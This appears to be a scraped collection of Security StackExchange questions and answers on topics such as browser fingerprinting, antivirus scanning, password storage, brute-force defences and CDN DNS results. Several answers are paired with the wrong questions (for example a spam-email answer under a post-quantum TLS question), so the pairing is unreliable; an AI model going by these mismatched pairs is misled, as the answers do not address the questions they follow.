Are there any quantum computing-secure open key exchange algorithms already implemented in SSL/TLS which I could use on my web server? As far as I know all the available-options like RSA, DH, elliptic curves etc are insecure to quantum computer brute-force. If (I assume) the answer is NO , are there any activities by major industry players to allow QC-secure algorithms in the near future?
Email addresses do not send spam. Email servers do. Anybody can forge your email address as the From address without hacking you at all. That's how you get spam all the time that says it comes from you. You can however tell from the email headers what servers it was sent through. Best thing to do would be to contact the third party that is hosting your email. Ideally, send them a copy of the headers from one of these spam emails. They will be able to tell where the emails are coming from. In fact, if they are coming from your website or a local computer sending email, they'll probably be contacting you eventually, since it will start getting their mail servers blacklisted eventually.
{ "source": [ "https://security.stackexchange.com/questions/173013", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163316/" ] }
173,020
I have two network segments (call them A @ 192.168.1.x and B @ 192.168.2.x ) plugged into two separate NICs ( NIC-A and NIC-B ). The OS on the physical machine is standard stock Ubuntu, with nothing configured to do any bridging on routing. So it can "see" both networks, but the two networks don't have a way to talk to each other. Devices on Network-B don't have a default gateway assigned. Network B has no internet access, and I want to make sure that it stays segregated. Is this sufficient to consider this solution fairly secure? Or should we consider implementing something on the OS to actually firewall these two networks?
Email addresses do not send spam. Email servers do. Anybody can forge your email address as the From address without hacking you at all. That's how you get spam all the time that says it comes from you. You can however tell from the email headers what servers it was sent through. Best thing to do would be to contact the third party that is hosting your email. Ideally, send them a copy of the headers from one of these spam emails. They will be able to tell where the emails are coming from. In fact, if they are coming from your website or a local computer sending email, they'll probably be contacting you eventually, since it will start getting their mail servers blacklisted eventually.
{ "source": [ "https://security.stackexchange.com/questions/173020", "https://security.stackexchange.com", "https://security.stackexchange.com/users/42265/" ] }
173,233
I am currently trying to mask the OS system I am using from the websites I visit. I'm doing this for an added layer of security. How would I go about hiding the OS from websites?
It is not currently possible to hide the type of OS from a website A solution against general fingerprinting and obtaining more specific information about your system is to use Tor Browser with the security slider set to high (in order to disable JavaScript). It is designed with fingerprint resistance in mind, attempting to look identical to all other instances of the browser. It provides resistance in several ways: Unlike a regular connection or a VPN, Tor exposes the network stack of the exit node, not of your own computer, so you do not have to mess with advanced TCP option mangling firewalls or modify low-level networking code in your operating system. With JavaScript disabled, system-specific behavior like high resolution math libraries (certain trigonometry functions give unique results for each operating system) and data formatting functions (which format the data in an OS-specific way). The user agent is standardized. There is no way to know what the underlying system is from just the user agent itself. Changing the user agent randomly makes you stand out as one of the few people doing it, so using a standard one is preferred. The default window size is standardized, so CSS and JS functions which obtain the window size cannot guess your operating system based on things like the size of your task bar. However , the task of preventing the general type of operating system from being known is currently impossible, even on Tor Browser. A list of whitelisted fonts is provided in order to prevent font rendering exploitation or font fingerprinting, but the whitelist is different for Linux, OSX, and Windows due to needing to use system fonts. There is currently no way around this. Until you find a way to provide system fonts without revealing what type of operating system you are using, you'll have no lock. Also note that EFF's Panopticlick is only meant to bring awareness to the issue of fingerprinting. It is extremely limited in what signatures it looks for, and does not analyze a representative sample. You should instead look into https://amiunique.org/ , which was designed from the current most extensive research into browser fingerprinting. How does fingerprinting work in general? While it is not possible to hide the general class of operating system you are running, you can make it so that you blend in with the so-called "anonymity set". A list of ways you can fingerprint a browser, with some notes, in case it is helpful: TCP/IP stack fingerprinting - The TCP protocol provides some extra extensions changing its behavior such as window size (unrelated to browser window size), max segment size (MSS), time-to-live (TTL), and others. It is also padded by a nop option which does nothing but make sure the size of the options are consistent. Different classes of operating systems use different values. Linux for example sets the TTL to 64, whereas Windows uses 255. Additionally, the order of these options and where the nops are inserted differs from OS to OS. Generic settings exposed by the browser - Certain things like the order of headers and the headers themselves can uniquely identify a browser. This includes thing like the system locale, DNT status, cookie status, etc. This is effectively all EFF's Panopticlick looks for, and a small subset at that. WebGL fingerprinting - When certain types of hardware acceleration are enabled, the browser gets low-level access to your GPU. By telling the GPU to generate certain 3D shapes with special graphical properties (textures, light, transparency, etc) and applying various transforms to it and then hashing the resulting pixmap, quirks unique to your specific GPU can be identified. This allows a browser to be identified regardless of the operating system it is run as. Audiocontext fingerprinting - Similar to WebGL fingerprinting, the browser can be told to generate triangle wave audio, then compress it, then increase gain and hash the resulting audio buffer. This hash will be unique to your system, regardless of what you have booted into. There is no need for the audio to actually be played for this to work. Timezone fingerprinting - The system's timezone as set in environmental variables is available via JavaScript. Math library fingerprinting* - When certain trigonometry functions are used, such as calculating the sin of the value 10, the system's math library is called, and this differs for each OS. It will likely be the same among classes of operating systems. Canvas fingerprinting** - By generating a visual canvas element and hashing it, results unique to your browser can be obtained. Window size fingerprinting** - The CSS @media elements can be used to selectively load resources based on the (often unique) size of the browser window. A website can create a large number of resources and see which ones your browser loads to tell the window size. Font list fingerprinting - Your font list is often fairly unique, and differs between different OSes. As mentioned earlier, there is no practical way to avoid this. Keeping a list of whitelisted system fonts reduces the fingerprinting accuracy to the general class of OS you are running. Date format fingerprinting* - If you call Date().toLocaleFormat() in the browser, the output string will depend on the operating system you are using. The output on Linux, OSX, and Windows 7 respectively is "Thu 26 Mar 2015 03:43:35 PM EDT", "Thu Mar 26 15:38:55 2015", and "Thursday, March 26, 2015 3:45:01 PM". Virtual core fingerprinting* - The hardwareConcurrency JavaScript feature can be used to automatically spawn a number of threads for performance. By starting with one and increasing it gradually, while giving the browser a CPU-heavy workload, the number of virtual cores can be guessed based on the point at which more threads no longer improve performance. * Tor Browser only mitigates these if JavaScript is disabled. ** Tor browser mitigates these with help from the user, so the user must follow its recommendations.
{ "source": [ "https://security.stackexchange.com/questions/173233", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163524/" ] }
173,284
The common anti-virus (to my knowledge) uses a kind of brute force type method where they get the hash of the file and compare it to thousands of known virus' hash. Is it just they have servers with super fast SSD and they upload the hashes to that and search really fast or am I completely wrong with my understanding of how they work?
Disclosure: I work for an anti-virus vendor. Because most anti-virus engines were born as protecting endpoints, and even now for many of them endpoint protection is major part of business, the modern anti-virus engines are optimized for scanning endpoints. This optimization includes many things, such as: Not scanning the files which couldn't contain infections which can infect your computer; Remembering which files were scanned, and not scanning them again unless the files were modified; Optimizing scans for the file types when possible - for example when scanning executables, only certain parts of it need to be scanned. This minimizes disk reads, and improves performance. A common misconception is that AV engines use hashes. They generally do not, for three reasons: First is that getting around hash detection is very easy and doesn't require modifying the actual malicious code at all; Second is that using hashes does not allow you to implement any kind of proactive protection - you will only be able to detect malware which you have seen; Calculating a hash requires the whole file to be read, while for some files (such as executables) this is not necessary. And reading the whole file on non-SSD hard drives is expensive operation - most AV engines should scan a large clean executable file faster than calculating hash on it
{ "source": [ "https://security.stackexchange.com/questions/173284", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163574/" ] }
173,391
I started working on an app that connects to a RESTful service for authentication and data. User POSTs the user name and password to /token endpoint. Once they log in successfully, they get a bearer token that they then append to the Authorization header in the subsequent calls to different protected resources. My question is what prevents users from intercepting their regular post from the app (getting the token) and then possibly sending bunch of POST requests (using something like postman or fiddler) to create a large number of fake posts or articles or whatever else the app does. What are some possible ways from protecting from this? Does the fact that the traffic to the service will eventually go via TLS make this a non-issue?
My question is what prevents users from intercepting their regular post form the app (getting the token) and then possibly sending bunch of POST requests (using something like postman or fiddler) to create a large number of fake posts or articles or whatever else the app does. Nothing Does the fact that the traffic to the service will eventually go via TLS make this a non-issue? This makes no difference at all. What are some possible ways from protecting from this? The most common one is rate limiting. I.e. if someone posts at a much higher level than anticipated reject the post. There are several approaches to this - when did they last post, rolling average over N minutes etc. If you don't want false positives resulting in users losing post content then make them re-authenticate to continue. Another approach is captchas. I.e trying to make the user prove they are human. Another is attempting to detect automatically generated content using spam filters or AI.
{ "source": [ "https://security.stackexchange.com/questions/173391", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163670/" ] }
173,484
I came across this question and I have never seen a site that does that, which is a red flag. However, the approach seems sound and it gets around having to implement password rules to enforce strong passwords. Also, if all sites did that it would ensure users don't reuse passwords. So what are the drawbacks of that approach? Is there a good reason all sites don't use that approach? Specifically, I'm assuming we follow best practices that came up in the comments and answers of that question, such as: generate a long (32+ char), random (with good randomness) password show it to the user once hash it with SHA256 resetting the password generates another long, random password In fact perhaps the approach could even be enhanced if instead of showing the password to the user, the site simply displayed a form with the password field filled in so the browser and/or passwords managers could memorize it. The user would just submit the form and would never have to see it.
Security at the expense of usability comes at the expense of security The problem is that there is only so much a web application can do to force good security practices on users. In this particular case I can tell you what will happen in the vast majority of cases: people will write down their "secure" password somewhere nice and insecure. As a result, this will not necessarily make anything more secure: it will just shuffle around where the vulnerability lives. In essence, this system is missing some necessary supporting architecture to make the user experience very easy, and therefore very secure. As a result there are basically three kinds of people with three different results: People who don't care/understand about password security. They are going to write down that uncrackable password in a place that is super-accessible, and as a result super-insecure. These are the same people that reuse the same weak passwords on every site. As a result, they go from one bad security solution to another bad security solution. These are also the majority of web users, so for the majority of the internet your solution has no real benefit. People who use password managers and other password helpers, their password systems cannot integrate with your website. These people will be worse off, as suddenly their normally-secure system can no longer be used. As a result they'll probably end up writing it down, maybe not securely, and be worse off then they were before. To be clear, this will definitely happen: your "show the password in a form so that the password manager can record it" solution will absolutely not work with some password managers. I can just about guarantee it. People who use password managers, and those password managers integrate properly with your system. They were already storing things securely and still are, but now with another point of failure: your random number generator. Overall, though, there security will neither have decreased nor increased substantially. Overall therefore, I would say that I see no real benefit for this system. I have to say this out loud because it is critical in all other contexts: you never want to use SHA256 to hash passwords. In this case you can probably get away with a fast hash because your password is too long for a brute-force to be feasible anyway. Edit to add the obvious answer I think the biggest problem with this solution is that it doesn't go far enough to fix the underlying problem. The underlying problem is that people suck at passwords: we either pick poor ones, reuse them, or don't store them securely. The solution isn't to come up with a new password system: the solution is to ditch passwords all together. Many companies are starting to introduce password-less login. That's the answer you really want.
{ "source": [ "https://security.stackexchange.com/questions/173484", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88744/" ] }
173,493
This commit in my GiHub repo is signed by a key I don't recognize: https://github.com/jonathancross/jc-docs/pull/2/commits/124672699991af75dd2454831670758f08bc74ab What is going on here?
GitHub itself is signing commits made through the online editor using the key 0x4AEE18F83AFDEB23 : From: https://help.github.com/articles/about-gpg/ GitHub will automatically sign commits you make using the GitHub web interface. These commits will have a verified status on GitHub. You can verify the signature locally using the public key available at https://github.com/web-flow.gpg
{ "source": [ "https://security.stackexchange.com/questions/173493", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16036/" ] }
173,603
For instance, would it be possible for an app to determine what pixel range on a smartphone display a user is looking at by analysing their eyes with the front facing camera? If so, with what kind of precision? It would be very discomforting to know that apps could collect data in the background on how your eyes respond to displaying certain advertisements.
Eye Tracking for Everyone. 2176-2184. 10.1109/CVPR.2016.239. (2016) - Krafka, Khosla, Kellnhofer et al Our model achieves a prediction error of 1.71cm and 2.53cm without calibration on mobile phones and tablets respectively. With calibration, this is reduced to 1.34cm and 2.12cm. So yes - it is possible. This particular study was performed using iOS and achieved a read rate at 10–15fps. There are several companies selling products with similar technology - UMoove for example. It would not surprise me if a higher precision than in the mentioned paper could be achieved. If you are paticularly concerned a number of smartphone camera covers are available - here is one example .
{ "source": [ "https://security.stackexchange.com/questions/173603", "https://security.stackexchange.com", "https://security.stackexchange.com/users/59369/" ] }
173,609
To give a quick background, we need to implement a solution where we can guarantee that information is stored encrypted. Access to the encryption data will only be possible through an application that has dedicated access to the database. With every "request" to this application, authentication details will be provided that is then used to create a log of who has read what information and when. My main requirements are: MySQL 5.5 Database will be replicated for backup purposes. One should be able to restore from such replicated database, but by accessing a replicated database I should not be able to read any information. My idea is to use application-level encryption and store explicit encrypted values in the database. That is, on a technical level, the database has no way of knowing that information is encrypted. The actual "structure" of the database (tables, columns etc) isn't something we consider secret. To implement the application-level encryption I'm thinking of applying AES_ENCRYPT/AES_DECRYPT that is built-in MySQL, using a passphrase that is only known by the application. Does anyone see a problem with this approach? Surely, the passphrase must be kept secret. If the passphrase would leak, I thinking that it would be trivial to re-encrypt all values with a new passphrase. The database isn't expected to be large, performance requirements are low. Development and testing environments would be easy to have, as the only difference would be the passphrase used.
Eye Tracking for Everyone. 2176-2184. 10.1109/CVPR.2016.239. (2016) - Krafka, Khosla, Kellnhofer et al Our model achieves a prediction error of 1.71cm and 2.53cm without calibration on mobile phones and tablets respectively. With calibration, this is reduced to 1.34cm and 2.12cm. So yes - it is possible. This particular study was performed using iOS and achieved a read rate at 10–15fps. There are several companies selling products with similar technology - UMoove for example. It would not surprise me if a higher precision than in the mentioned paper could be achieved. If you are paticularly concerned a number of smartphone camera covers are available - here is one example .
{ "source": [ "https://security.stackexchange.com/questions/173609", "https://security.stackexchange.com", "https://security.stackexchange.com/users/163905/" ] }
173,685
Take a look at below picture. This page is not loaded over https, so how do modern browsers make sure this page is secure?
What is there to secure it from? It's loaded directly within the browser. There is no connection outside of the local user context of the machine meaning there is nothing to intercept / tamper with. To modify what you see you'd have to either modify the browser executable, memory space or modify the underlying data used to store the settings. To read the values you would have to be able to read either the browser memory space or underlying files. All of these are end-game. If a malicious actor can do that they have full control and there is no way to protect from it.
{ "source": [ "https://security.stackexchange.com/questions/173685", "https://security.stackexchange.com", "https://security.stackexchange.com/users/34823/" ] }
173,737
So I'm wondering how many passwords is enough to have my data safe because right now I have 1 hard password for bank & mail (>10 characters + numbers etc.) and 1 medium password for games and 1 for shady sites. I keep all them memorized and not on paper/in a document. Is this enough?
No, it is not enough. Using the same password for both your email and your bank is a bad idea. If your email provider is compromised, that means the attacker will get access to your bank account, and vice versa. You don't want that. Use one hard password per site. You won't be able to memorise all those, but don't worry. That's what password managers are for. If you want this explained in a video featuring an animated octupus, the Electronic Frontier Foundation got you covered .
{ "source": [ "https://security.stackexchange.com/questions/173737", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164024/" ] }
173,901
I have recently joined a security focused community in my organisation. Many of our products are deployed in the intranet (on-premise) nothing in the public cloud. So, the internal portals can be accessed within the organisation's network only. Recently, a third party Apache library's security vulnerability (apparently, a remote code execution one) was published. Our security lead had asked us to upgrade the library to the latest fixed version immediately. I had asked, " Since the portal is accessed only in the intranet behind a firewall, do we still need to upgrade the library? ". The lead could not provide a detailed explanation due to lack of time and confirmed that the upgrade needs to happen regardless. So, what's wrong with the statement (assumption?), "since we are behind a firewall and such vulnerabilities do not affect us".
Your statement makes two faulty assumptions: Your firewall(s) is/are fully correctly configured and has no vulnerabilities that would allow an attacker to compromise it and that perfect state will continue. Everyone in your organisation is trustworthy and presents no risk. You should always operate on a defence in depth approach and secure every layer wherever you can. If an attacker does penetrate a perimeter, or you do have a rogue actor, then this Apache vulnerability could be exploited if unpatched.
{ "source": [ "https://security.stackexchange.com/questions/173901", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164180/" ] }
174,005
I've found that some .gov sites are being redirected to a Chinese IP. I have searched across Internet to see if this a known form of malware but I'm unable to find any info. I would like someone guiding me to isolate the infected files and report to AV if applicable. This is a nslookup resolution from the infected computer: C:\Users\Alex>nslookup www.whitehouse.gov Servidor: google-public-dns-a.google.com Address: 8.8.8.8 Respuesta no autoritativa: Nombre: www.whitehouse.gov Address: 139.129.57.70 This is a valid response from a Linux computer in the same network: alex@nas:~$ nslookup www.whitehouse.gov Server: 8.8.8.8 Address: 8.8.8.8#53 Non-authoritative answer: www.whitehouse.gov canonical name = wildcard.whitehouse.gov.edgekey.net. wildcard.whitehouse.gov.edgekey.net canonical name = e4036.dscb.akamaiedge.net. Name: e4036.dscb.akamaiedge.net Address: 104.83.16.193 As you can see something is intervening the DNS requests and redirecting to 139.129.57.70, that is a Chinese IP. I think this computer is infected by some kind of malware made to impersonate as gov sites and leak info. Any clue about which files may be infected?
Content Delivery Network This is probably part of a Content Delivery Network with a lot of political issues to consider. If you try dig www.whitehouse.gov a , underneath the answer section you'll see the following: www.whitehouse.gov. 131 IN CNAME wildcard.whitehouse.gov.edgekey.net. wildcard.whitehouse.gov.edgekey.net. 731 IN CNAME e4036.dscb.akamaiedge.net. e4036.dscb.akamaiedge.net. 20 IN A 23.73.28.110 See the CNAME addresses? Try host -t A www.whitehouse.gov for a better explanation: www.whitehouse.gov is an alias for wildcard.whitehouse.gov.edgekey.net. wildcard.whitehouse.gov.edgekey.net is an alias for e4036.dscb.akamaiedge.net. e4036.dscb.akamaiedge.net has address 23.73.28.110 Do you notice that I'm getting a different IP address than you? Note the wildcard*edge* portion? What is that? It's an edge server which is supposed to be closest to you. Are you using a VPN on your Linux machine, or Windows Machine? Maybe one that's in Hong Kong, Hangzhou, or somewhere else in East Asia? Maybe your router is configured to use a VPN, or go through TOR? The IP address you received belongs to Aliyun Computing Co. Ltd, which is part of the Alibaba Cloud/CDN suite. But wait, how did we we get an Aliyun Cloud/CDN (Alibaba) IP address from Akamai? Aren't they competitors? Again, are you using a VPN on your Linux machine, or Windows Machine? Maybe one that's in Hong Kong, Hangzhou, or somewhere else in East Asia? Maybe your router is configured to use a VPN, or go through TOR? Akamai does operate in China , but... Want to make money in China? You have to follow Beijing's rules. I think we just found something embarrassing for Akamai: in order to operate in China, they were likely forced into a partnership with them. To do business in China, almost all foreign companies were previously required to hand over control of their intellectual property to a joint Chinese partner to be allowed to operate in the country. Let's look at the IP you gave us: whois 139.129.57.70 | grep -i 'Ali\|Hangzhou' : netname: ALISOFT descr: Aliyun Computing Co., LTD descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China , 310099 address: NO.969 West Wen Yi Road, Yu Hang District, Hangzhou e-mail: jiali.jl@ alibaba-inc.com address: No.391 Wen'er Road, Hangzhou City e-mail: anti-spam@list. alibaba-inc.com e-mail: cloud-cc-sqcloud@list. alibaba-inc.com address: Hangzhou, Zhejiang, China address: No.391 Wen'er Road, Hangzhou City e-mail: guowei.pangw@ alibaba-inc.com In this case, the Akamai partner is likely Alibaba/Aliyun. This allows the Chinese government, if they so desire, to serve malicious content to visitors by way of the CDN. Every single CDN is, in my opinion, MITM as a service. Wireshark? You might be doing it wrong. What if you did have a DNS hijacking/MITM issue of some sort? If you want to use Wireshark, you probably cannot do a packet capture between your router and computer unless the problem exists primarily on your Windows 10 machine. You'd simply be receiving whatever your router provides you with. If there is no problem with your Windows 10 machine, then using Wireshark on your computer will likely not provide you any meaningful information. What if your router has been compromised? What you could do is put a switch with port mirroring capabilities between your gateway and your router, and use the port mirror to see what's going on. Or a LAN throwing star. This way, you can see what your router is sending and receiving, and compare that to what Wireshark sees.
{ "source": [ "https://security.stackexchange.com/questions/174005", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164300/" ] }
174,082
There has been a post on Niebezpiecznik.pl , a popular InfoSec blog, describing an interesting situation. A company mistakenly granted access to their BitBucket repo to a a random programmer. This programmer subsequently alerted various employees of the company, urging them to revoke access ASAP. He found these employees sluggish (for example, one said he would only revoke the access once he was back from his vacation), so alerted the Niebezpiecznik blog, which subsequently contacted the company. Only then was access revoked. It is clear that the programmer considered the lack of prompt revocation of access to be a very grave oversight on behalf of the company's security policy. And here is where I'm surprised. So, let's consider this from the company's point of view. Someone contacts them, claiming that he has been spuriously granted access to their private repo and urging them to revoke this access. Now this person either is or is not interested in the contents of this repo; he also either has or has not strong enough moral values to refrain from downloading it. If he's willing to inspect the contents of the repo, he's already had ample time to do this; and if he hasn't done this yet, then he will likely still not have done this by the time the employee is back from his vacation. In other words, the milk has already spilled and nothing worse than what has already happened is likely to happen in the future. As a result, I would think, the situation is no longer urgent and can soundly wait until the employee is back from his vacation. Where am I wrong?
There's a number of reasons: If it has happened to one person, it might have happened to more. These other people might not be as kind. Who knows, this person might change their mind. When they made the effort to contact you, and just gets a "meh" in return, they might be a bit annoyed and decide to punish you for it. Or maybe they just want to poke around a bit for fun, and accidentally break something. You probably want to check the logs to see that this person is telling the truth. Maybe they silently stole your encryption keys before contacting you. You probably want to rotate all your secrets just to be sure. And most importantly, this is a Big F*cking Deal™. Anyone who is not reacting with shock and horror, but instead orders another piña colada, clearly doesn't understand the gravity of the situation. There's some very good points in comments and this answer that all might be fine under certain circumstances (e.g. read only access, no secrets in the code, etc.). That is correct, but I would still argue that this should be taken more seriously. Are you really 100% sure there are no secrets in some old commit in your repo? The very fact that someone who shouldn't have access to your systems got it anyway is in itself a bad omen.
{ "source": [ "https://security.stackexchange.com/questions/174082", "https://security.stackexchange.com", "https://security.stackexchange.com/users/108649/" ] }
174,085
I stay at a dorm. I am wondering about the security of the log-in wifi system. I want to know if my browsing history can be seen by the internet-admin that I'm connecting with. If I install an OS on a virtual machine, will I be safe from the attacker (because I'm still connecting to the public wifi)?
There's a number of reasons: If it has happened to one person, it might have happened to more. These other people might not be as kind. Who knows, this person might change their mind. When they made the effort to contact you, and just gets a "meh" in return, they might be a bit annoyed and decide to punish you for it. Or maybe they just want to poke around a bit for fun, and accidentally break something. You probably want to check the logs to see that this person is telling the truth. Maybe they silently stole your encryption keys before contacting you. You probably want to rotate all your secrets just to be sure. And most importantly, this is a Big F*cking Deal™. Anyone who is not reacting with shock and horror, but instead orders another piña colada, clearly doesn't understand the gravity of the situation. There's some very good points in comments and this answer that all might be fine under certain circumstances (e.g. read only access, no secrets in the code, etc.). That is correct, but I would still argue that this should be taken more seriously. Are you really 100% sure there are no secrets in some old commit in your repo? The very fact that someone who shouldn't have access to your systems got it anyway is in itself a bad omen.
{ "source": [ "https://security.stackexchange.com/questions/174085", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164376/" ] }
174,125
I'm a parent who has a parent account with my local school district so that I can log in to their website to view my child's grades etc. I clicked the "forgot password' button, and my password was emailed to me in plain text. This concerned me, so I emailed the principal, including some links from the bottom of this page . This is the reply I received from the organization's IT department: Parent passwords are not stored in plain text. They are encrypted. Not a 1 way encryption but a 2 way encryption. This is how the system is able to present it back via an email through Ariande's CoolSpool utility. For support reasons, the parent password is visible to certain staff until the parent has successfully signed in 3 times. After that, no staff can see that password. However, it is stored in such a way that the system itself can send it back to the verified email. In the future after a parent's 3 successful sign ins, if they forget their password, their verified email account will be sent a link to reset their password, this change is in the works. Does this explanation justify the plain text password being sent by email, and are my passwords secure with them? If not, what references or resources could I reply to them with?
No, this is not a good practice. There are two distinct problems. encrypting the password instead of hashing it is a bad idea and is borderline storing plain text passwords. The whole idea of slow hash functions is to thwart the exfiltration of the user database. Typically, an attacker that already has access to the database can be expected to also have access to the encryption key if the web application has access to it. Thus, this is borderline plaintext; I almost voted to close this as a duplicate of this question , because this is almost the same and the linked answer applies almost directly, especially the bit about plaintext offenders; there is another answer about plaintext offenders as well. sending the plain text password via plain text email is a bad idea. They could argue that there is no difference when no password reuse happens, but I doubt they would even know what that is and why it’s considered bad practice. Also, password reuse is so common that that wouldn’t be a good answer. Additionally, as they seem to be working on the second part (even though password reset links in plain text emails are in the same ballpark, i.e. a threat that can read the password from the plain text mail can also read the link, maybe before you can), you could explain them the problem about not hashing from my answer, also feel free to link this answer directly. Maybe even explain that encryption is one way, but can always be reversed by the inverse function of the crypto system in question, aptly named decryption. Using terms like "one way encryption" and "two way encryption" rather than "hashing" and "encryption" shows a lack of understanding. The real problem is: them implementing a password reset does not mean they will hash (correctly) in the future; there is not much you can do about this except using a password manager and create a long, strong passphrase that is unique for this site and hope for the best. This is especially true since they seem to want to keep the part of their system that tells staff your password (for absolutely no good reason). The implication being they keep not hashing properly - them saying staff can only see the password in that three login timeframe is not true; if the web app can access the key, so can the administrative staff. Maybe no longer the customer support staff but they shouldn’t be able to see it in the first place. That is horrifically bad design. Depending on your location, schools as being part of the public sector have obligations to have a CISO you can contact directly, expressing your concerns. And as usual in the public sector, there ought to be an organization that is supervising the school; they should have a CISO at least, who might be quite interested in this proceeding.
{ "source": [ "https://security.stackexchange.com/questions/174125", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164408/" ] }
174,218
I design a 'secure' login system. Let's focus in the brute force prevention. In my Android client I have a counter that counts the number of times that the user tries to login, with false credentials. When it reaches 3 fail tentatives, I disable the login button and the password field, forcing the user to restart the app, and thus blocking the brute force attack. Is this the right thing to do? Or should I put a counter in the server? But in the server it can lead to DoS, if I receive a lot of brute force attempts at the same time, right? The idea is stop the infinite number of inputs, so in my opinion this can be done in the application side, in my case in the Android client. I'm open to suggestions.
Client side measures are only a partial (and mostly cosmetic) solution, this can only limit non-serious attempts. Any serious attempt will either hit your server directly because a login URL/API was detected, or will run your client through an intercepting proxy to capture the details required to create a brute force run. Robust defences generally require you to assume that the attacker knows everything about the system except the secret key ( Kerckhoff's Principle ) so you should start from that position. Mitigating measures include: make it hard/impossible for an attacker to determine valid user names, invalid passwords or locked out accounts (basically minimal feedback, i.e. no "invalid username" or "password too long" messages, though issue a unique incident code if this is important for user support). As noted in the comment by My1 , open registration may be a weak point here. make it hard to determine anything other than success or failure, a failed login should take the same time as a successful one — this usually means making both artificially long (200ms is a starting point) make the login API multi-step using a nonce or some time- or session-based token to complicate automated attacks, and prevent distributed attacks; or add some client-side proof of work (client side password hashing is one option, but needs careful consideration ) make sure the password space is sufficiently large, encourage (and support!) the use of a password manager use account lockout and source IP lockout with exponentially increasing lockout times (e.g. double the lockout time on each failure, this should avoid annoying a user who gets a password wrong a couple of times). As noted in the comments, this is an opportunity for DOS, so consider the tradeoffs carefully implement adaptive rate-control and malicious activity detection (this is generally harder than any of the other solutions as it requires additional state and logic on the server side) consider adding an "under attack" mode of operation that can be enabled as required, ideally this will have minimal impact on users From CAPEC-112 Brute Force : The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. While the defender cannot control the resources available to an attacker, they can control the size of the secret space. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information. See also CAPEC-49 Password Brute Forcing
{ "source": [ "https://security.stackexchange.com/questions/174218", "https://security.stackexchange.com", "https://security.stackexchange.com/users/139435/" ] }
174,224
I would like to know how you make employees report incidents. Incident reports are a key element of an ISMS. No reports = No discovery of the incident = High chance things go out of control. We have a kind of game: people can give red cards to each other for small incidents. The cards tell them to report the incident, but people don't want to. I can imagine we have to use a reward system (focus on positive) to make people report and do their best to limit incidents, but how? The reporting system currently works like this: Person B.A. sees Person A.B is not locking his computer. He then (should) give(s) a red card to the person, takes a picture and send it to the incident@company email with the name of the person in the mail. The mail goes to InfoSec team (not only IT guys btw) who then put it in the system. Now, no-one sends those emails. I am checking to get enough reports for the audit, but that means people will not report because I will. I did stop checking for a month, then the number dropped to 1/4 of the previous month. I started checking again and it immediately rose... What to do? -Edit-important note: I am a student, doing this as internship. I am an engineering management student, new to this area when I started 3months ago, no IT knowledge. The company is an IT company in Bulgaria. Now 200 employees, last year 100. Now everything is changing very fast of course. That is not the way it should be but the way it is. Please take those things into consideration when you reply. Feedback is welcome, but please tell me How
Of course no one wants to report, they are "turning in" their peers. Also, the time and complexity it takes to go through the reporting process you described is another negative reinforcement. You are only going to get low compliance if everything is a negative. And ... YOU CANNOT FORCE PEOPLE TO DO ANYTHING!! You are approaching the problem backwards. You need to: use technical controls so that people do not have to think (set an auto-lockout time on idle workstations) reward people for doing the right thing (and no, reporting their peers is not the right thing) Instead of punishing non-locked stations, reward people who locked their stations! Praise them publicly, offer them a chocolate. Whatever works for that office/local culture. Your focus, at the moment, is to collect metrics for your incident reports. I suggest that this is also backwards. Locking a station is a behaviour . Not locking a station is not an incident (it's an event, at best). You are never going to get accurate metrics, so I'm not sure why this would be a focus. I know that it is a huge mental shift, but there is a big difference between an intentional act of omission or commision (to not do or to do something) to violate policy (an incident) and inattention and inertia that results in non-compliance. You cannot confuse the two. Non-compliance is a behaviour issue, which needs to be handled (and tracked) differently. To answer your question directly, in order to get people to do things, you need to address 3 factors: motivation ability trigger They have to want to do it, it needs to be easy to do, and the trigger for when they are supposed to do it needs to be clear (the Fogg Model ). Scratching an itchy nose has high motivation, it's easy to do, and the itch is its own trigger. So, everyone does it reliably. Reporting your peer for not locking a workstation has low motivation (even if you rewarded them for reporting), the process is complex, and the trigger is also not that clear. When does one deem that there is non-compliance? Does one have to be watching all the time? What if the other user stepped away and was within view of their workstation? What if the user is "looking out" for the workstation to ensure there is no unauthorised access? You simply are on the wrong side of the Fogg Model. Address these 3 factors, and you can experience high compliance.
{ "source": [ "https://security.stackexchange.com/questions/174224", "https://security.stackexchange.com", "https://security.stackexchange.com/users/164379/" ] }
174,235
From what I understand, it is impossible to verify whether a file has been modified since its creation. Specifically, I was wondering whether it was possible to verify whether a photo was modified since its capture. However, according to the question " How to detect if a photo's metadata has been changed? " it is not: It is sadly impossible to to prove when an image (or any file for that matter) originated. It is possible (if the author wants to) to prove that a file existed prior to a given time by signing the file from a third party time stamping server (through which the third party proves that the file existed at the time of the signing) but such information is not automatically possible and can easily be stripped. I am also an IT Security guy and there is no possible secure way to prove the creation date of any file if the user controls the system creating the file with current technology that I am aware of. The best bet would be a device with a locked clock that would have a hidden key store that the user shouldn't have access to and create a signature based on this so that they couldn't fake their own signature, but since the key must still reside in the device, it is still feasibly possible for someone to break as all the necessary information is in their possession, even if it is hard to get to. I feel like this explanation is somewhat similar to why DRM does not work (you can't give a person the lock and the key), but I'm still not clear on the explanation. I also think this is different than how TLS/SSL works . In the aforementioned case, you're trusting a source to give you files without any information on how many times the files were altered.
I think you will want more of a philosophical answer than a technical one, given what you are rejecting. A file is just a discrete collection of bits. Relevance and meaning are overlaid onto those bits by a human, but ultimately, it's just bits. How would it be possible to determine if the bits you have are in the same sequence in some unknown previous state? Answer: saving that state in a way that can be trusted to be used as a means of comparison. That's why TLS/SSL uses 3rd party CAs to verify certificates, and why digitally signing files is useful. They provide a trusted means of having a state to compare. It's not perfect, but very effective if performed correctly.
{ "source": [ "https://security.stackexchange.com/questions/174235", "https://security.stackexchange.com", "https://security.stackexchange.com/users/12306/" ] }
174,350
